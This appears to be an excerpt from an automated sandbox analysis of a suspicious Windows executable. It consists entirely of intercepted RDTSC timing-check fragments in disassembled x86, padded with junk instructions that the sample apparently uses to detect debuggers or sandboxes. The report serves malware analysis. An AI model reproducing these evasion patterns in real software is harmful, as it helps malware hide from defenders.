              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D151 second address: C6D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC0410B9FA6h 0x0000000a jne 00007FC0410B9FA6h 0x00000010 jmp 00007FC0410B9FB6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a jl 00007FC0410B9FA6h 0x00000020 pop eax 0x00000021 jmp 00007FC0410B9FB7h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D2FF second address: C6D310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F643FCh 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D310 second address: C6D346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC0410B9FA6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC0410B9FB9h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jno 00007FC0410B9FA8h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D346 second address: C6D34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D4C5 second address: C6D4C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D615 second address: C6D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC040F643F6h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007FC040F643FEh 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D79D second address: C6D7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D7A3 second address: C6D7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jnl 00007FC040F643F6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D7B6 second address: C6D7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D8FF second address: C6D905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D905 second address: C6D935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC0410B9FABh 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007FC0410B9FA6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FC0410B9FB2h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D935 second address: C6D93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D93B second address: C6D94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC0410B9FABh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D94F second address: C6D955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16CB second address: CD16D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16D1 second address: CD16E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16E6 second address: CD16F7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16F7 second address: CD16FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD16FF second address: CD170C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC040F643F8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD925D second address: CD928D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FC0410B9FA6h 0x00000009 pop eax 0x0000000a jno 00007FC0410B9FBCh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81AB second address: CD81D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC040F64409h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81D1 second address: CD81D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81D5 second address: CD81F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC040F643F6h 0x00000008 jmp 00007FC040F64402h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD81F1 second address: CD81F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8351 second address: CD8366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8366 second address: CD836A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8F96 second address: CD8FBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC040F64408h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8FBC second address: CD8FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FC0410B9FA6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CD8FCA second address: CD8FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDF2B6 second address: CDF2C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC0410B9FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEE22 second address: CDEE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64400h 0x00000009 jp 00007FC040F643F6h 0x0000000f popad 0x00000010 jnp 00007FC040F643F8h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEE45 second address: CDEE50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC0410B9FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEF97 second address: CDEF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEF9B second address: CDEFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC0410B9FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jno 00007FC0410B9FA6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e ja 00007FC0410B9FA6h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CDEFBF second address: CDEFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0B2 second address: CFA0DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC0410B9FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 jbe 00007FC0410B9FB0h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0DC second address: CFA0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0E0 second address: CFA0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0E4 second address: CFA0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFA0EA second address: CFA0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC0410B9FA8h 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0C8 second address: CFC0CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0CC second address: CFC0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC0410B9FBBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0F0 second address: CFC0FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFC0FC second address: CFC100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBC30 second address: CFBC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBC36 second address: CFBC3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBDB6 second address: CFBDD7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC040F643F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC040F643F6h 0x0000001b jns 00007FC040F643F6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: CFBDD7 second address: CFBDDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1309B second address: D130CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FC040F643F6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007FC040F64408h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D130CA second address: D130D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D130D0 second address: D130D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D11F25 second address: D11F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC0410B9FA6h 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jne 00007FC0410B9FA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D11F39 second address: D11F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12216 second address: D1221A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1235C second address: D12378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC040F643F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC040F643FFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12378 second address: D1237E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D124C5 second address: D124C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127BF second address: D127CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC0410B9FACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127CB second address: D127D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FC040F643F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D127D7 second address: D127DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1296D second address: D12995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC040F64400h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC040F643FCh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12995 second address: D12999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C54 second address: D12C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64401h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C69 second address: D12C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C6F second address: D12C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12C73 second address: D12C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12DE4 second address: D12DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FC040F643F6h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D12DF3 second address: D12DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D17273 second address: D1727D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC040F643FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D18E12 second address: D18E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB0h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D18E2B second address: D18E47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC040F643F6h 0x00000008 jnl 00007FC040F643F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 pushad 0x00000012 jng 00007FC040F643FEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: D1AEEE second address: D1AEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C34E9F second address: C34EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 je 00007FC040F643F6h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 je 00007FC040F643FCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6035A second address: 4F60360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60360 second address: 4F60364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60364 second address: 4F60375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e push ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60375 second address: 4F6038E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64405h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6038E second address: 4F60392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60392 second address: 4F603A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603A2 second address: 4F603A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603A9 second address: 4F603C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603C0 second address: 4F603C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603C6 second address: 4F603E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64409h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F603E3 second address: 4F60420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC0410B9FB5h 0x00000014 sbb ecx, 449229D6h 0x0000001a jmp 00007FC0410B9FB1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60420 second address: 4F60426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60426 second address: 4F6042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6042A second address: 4F6043E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F6043E second address: 4F60444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F60444 second address: 4F60448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F80795 second address: 4F8079B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F8079B second address: 4F807A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: 4F807A1 second address: 4F807D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC0410B9FACh 0x00000014 pop eax 0x00000015 mov edx, 2F8E3A96h 0x0000001a popad 0x0000001b rdtsc
